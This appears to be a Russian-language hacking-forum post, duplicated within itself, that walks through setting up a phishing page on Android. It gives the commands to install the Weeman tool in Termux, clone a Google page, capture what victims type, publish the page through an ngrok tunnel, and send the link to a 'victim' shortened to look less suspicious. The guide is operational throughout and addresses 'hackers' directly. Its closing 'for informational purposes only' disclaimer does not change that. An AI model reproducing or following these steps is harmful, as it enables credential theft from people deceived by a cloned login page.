- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
Сначала скачаем и установим самую новую версию "Termux":
https://play.google.com/store/apps/details?id=com.termux
Для установки утилиты - нам потребуется ввести несколько команд в установленном и открытом "termux":
Теперь обновим пакеты и репозиторий:
pkg update -y && pkg upgrade -y
Установим
"git" и "python 2":
apt install git && apt install python2
Скачаем утилиту "weeman":
git clone https://github.com/evait-security/weeman
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
cd weeman
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички - читайте статью дальше:
Устанавливаем сайт, который будет скопирован ( Полный URL ):
set url https://google.comhttps://google.com/
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
set action_url https://google.comhttps://google.com/
Устанавливаем порт для дальнейшей работы в "ngrok" ( На не рутированных устройствах - только "8080" ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
show
run
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства - нам нужно установить и настроить "ngrok", чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию "termux":
Установим "ngrok":
cd
apt update && apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды - нужно ввести букву "y" для соглашение с установкой "ngrok" )
Теперь нам нужно авторизоваться на сайте "ngrok" любым способом: https://ngrok.comhttps://ngrok.com/
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа - нас нужно ввести команду для активации вашего аккаунта в "termux":
ngrok authtoken {ВАШ КЛЮЧ}
После данных манипуляций ваш аккаунт должен был подключится к "ngrok", который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте - они отобразятся в сесси, там где мы запустили утилиту "weeman". Если вам не нравится данная ссылка - ее можно сократить на любом сайте или приложении по сокращению ссылок.
ПОДРОБНЕЕ ДЛЯ ТЕХ КТО НЕ ПОНЯЛ:
Гайд: Как развернуть фишинговую страницу с помощью Termux + Weeman + Ngrok (Android)
Привет, хакеры. В этой статье покажу, как настроить фишинговый сайт прямо с Android через Termux и утилиту Weeman. Это удобно, просто и не требует рутирования системы (частично).
1. Установка Termux
Скачайте актуальную версию Termux:
https://play.google.com/store/apps/details?id=com.termux
2. Настройка Termux и установка Weeman
Открываем Termux и вводим по очереди:
pkg update -y && pkg upgrade -y
apt install git
apt install python2
git clone https://github.com/evait-security/weeman
cd weeman
python2 weeman.py
3. Настройка Weeman
Задаем параметры фишинговой страницы (пример на Google):
set url https://google.com/
set action_url https://google.com/
set port 8080
show
run
Теперь Weeman запустит клон сайта в вашей локальной сети. Осталось сделать его доступным извне через ngrok.
4. Установка и настройка Ngrok
Открываем новую сессию Termux:
cd
apt update && apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
После последней команды подтвердите установку, введя y.
Зарегистрируйтесь на ngrok.com, получите свой AuthToken, и выполните:
ngrok authtoken ВАШ_ТОКЕН
5. Запуск туннеля к фишинговой странице
ngrok http 8080
Вы получите публичную ссылку, ведущую на ваш фишинговый сайт. Отправьте её жертве. Все введённые данные отобразятся в Weeman.
Важно: если ссылка кажется подозрительной — используйте сокращатель ссылок (например, bitly.com).
Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственности за возможные последствия.
https://play.google.com/store/apps/details?id=com.termux
Для установки утилиты - нам потребуется ввести несколько команд в установленном и открытом "termux":
Теперь обновим пакеты и репозиторий:
pkg update -y && pkg upgrade -y
Установим
"git" и "python 2":
apt install git && apt install python2
Скачаем утилиту "weeman":
git clone https://github.com/evait-security/weeman
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
cd weeman
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички - читайте статью дальше:
Устанавливаем сайт, который будет скопирован ( Полный URL ):
set url https://google.comhttps://google.com/
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
set action_url https://google.comhttps://google.com/
Устанавливаем порт для дальнейшей работы в "ngrok" ( На не рутированных устройствах - только "8080" ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
show
run
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства - нам нужно установить и настроить "ngrok", чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию "termux":
Установим "ngrok":
cd
apt update && apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды - нужно ввести букву "y" для соглашение с установкой "ngrok" )
Теперь нам нужно авторизоваться на сайте "ngrok" любым способом: https://ngrok.comhttps://ngrok.com/
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа - нас нужно ввести команду для активации вашего аккаунта в "termux":
ngrok authtoken {ВАШ КЛЮЧ}
После данных манипуляций ваш аккаунт должен был подключится к "ngrok", который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте - они отобразятся в сесси, там где мы запустили утилиту "weeman". Если вам не нравится данная ссылка - ее можно сократить на любом сайте или приложении по сокращению ссылок.
ПОДРОБНЕЕ ДЛЯ ТЕХ КТО НЕ ПОНЯЛ:
Гайд: Как развернуть фишинговую страницу с помощью Termux + Weeman + Ngrok (Android)
Привет, хакеры. В этой статье покажу, как настроить фишинговый сайт прямо с Android через Termux и утилиту Weeman. Это удобно, просто и не требует рутирования системы (частично).
1. Установка Termux
Скачайте актуальную версию Termux:
https://play.google.com/store/apps/details?id=com.termux
2. Настройка Termux и установка Weeman
Открываем Termux и вводим по очереди:
pkg update -y && pkg upgrade -y
apt install git
apt install python2
git clone https://github.com/evait-security/weeman
cd weeman
python2 weeman.py
3. Настройка Weeman
Задаем параметры фишинговой страницы (пример на Google):
set url https://google.com/
set action_url https://google.com/
set port 8080
show
run
Теперь Weeman запустит клон сайта в вашей локальной сети. Осталось сделать его доступным извне через ngrok.
4. Установка и настройка Ngrok
Открываем новую сессию Termux:
cd
apt update && apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
После последней команды подтвердите установку, введя y.
Зарегистрируйтесь на ngrok.com, получите свой AuthToken, и выполните:
ngrok authtoken ВАШ_ТОКЕН
5. Запуск туннеля к фишинговой странице
ngrok http 8080
Вы получите публичную ссылку, ведущую на ваш фишинговый сайт. Отправьте её жертве. Все введённые данные отобразятся в Weeman.
Важно: если ссылка кажется подозрительной — используйте сокращатель ссылок (например, bitly.com).
Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственности за возможные последствия.